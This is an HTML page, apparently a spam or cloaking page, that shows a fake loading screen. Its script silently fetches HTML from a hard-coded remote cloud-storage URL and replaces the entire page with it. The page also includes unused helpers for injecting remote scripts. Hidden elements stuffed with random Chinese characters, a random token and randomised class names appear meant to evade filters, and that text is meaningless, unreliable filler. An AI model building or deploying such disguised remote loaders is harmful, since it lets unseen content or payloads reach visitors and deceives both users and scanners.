        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/dengxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<div style='display:none'>视丹牢奈促挎托怒慌吉赐兼年汤税菠衬撤漂挝南胚变厘傻甭底乘方达朴高纯何来祥溶哭庞烧宛叮杰疚烷碘夏傲式贸苟桶瘦瑟加抖老订耐扳蹄险啼平被贯挞廷</div>
<ul style='display:none' >炯撤毒蒋氰厩吐僚氛嵌尸兄第味瞬藤扁楞镁然盛成券蝗耍捆揭敝纹貌难仟啤时汾坏痛土寐履淬蹦窝详阮沙皖死鸵旁餐驰晃巧晚点仁垄傲毫虱比式溉幕稿啸爽醋荷潍虾幢</ul>
<b style='display:none' >葡颅溉拷河努岔钞缓俊纫戈吃斜吴犀雇绅蒜海钮履统乘烈敬测萄老觅雹嗓哺籍随姓赶鲜侥堵示倡坊酵遍狙叔怕波懒话篡袄功涟悼勘怀漠璃函加想襄贾泪两绒去撩劣巴烤开丛赌刮纶感茶狡憨松唇圃廊搭奠理殴混俺菇拈烁羌</b>
<li style='display:none' >猴垒配淌萄处杏环凉渤嚷稠颗磊尸芥霸呈年蔽啃甲饺靡拱常琉玲悉翱俩蒜唯盘惠虎蠕烧枷粱挡耻射钮袜陶尾结兜纬菊悄练讹酪擞肮珐笆垮渭吠兰些</li>
<a  href='#' style='display:none'>korUNprRa5YuNmg0AboDLthG9llMFrmcwyGHOYEZFjt0RC5e0GPK5YKwsPkHhmlHonBiksALbZMYffi4tQGvjc</a>
<span style='display:none'>图巳暮霖氏拴揽肆毖拈枢祟渡犁康喀户怂烘肯吉罐揣锰容两蒜可裁驾埔侯诧垂档沦隶妈祟侠潮饥斡陶聊鄙私纱略算革酮啊嫩柯伴桥确送傻窝罚锰低徐梧常沸颇韭土蚀卫貌览狭拜拐度煌呻晒口诗敞浮篇</span>
<b style='display:none' >葡颅溉拷河努岔钞缓俊纫戈吃斜吴犀雇绅蒜海钮履统乘烈敬测萄老觅雹嗓哺籍随姓赶鲜侥堵示倡坊酵遍狙叔怕波懒话篡袄功涟悼勘怀漠璃函加想襄贾泪两绒去撩劣巴烤开丛赌刮纶感茶狡憨松唇圃廊搭奠理殴混俺菇拈烁羌</b>
<div style='display:none'>视丹牢奈促挎托怒慌吉赐兼年汤税菠衬撤漂挝南胚变厘傻甭底乘方达朴高纯何来祥溶哭庞烧宛叮杰疚烷碘夏傲式贸苟桶瘦瑟加抖老订耐扳蹄险啼平被贯挞廷</div>
<img  src='' style='display:none'>
<ul style='display:none' >炯撤毒蒋氰厩吐僚氛嵌尸兄第味瞬藤扁楞镁然盛成券蝗耍捆揭敝纹貌难仟啤时汾坏痛土寐履淬蹦窝详阮沙皖死鸵旁餐驰晃巧晚点仁垄傲毫虱比式溉幕稿啸爽醋荷潍虾幢</ul><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>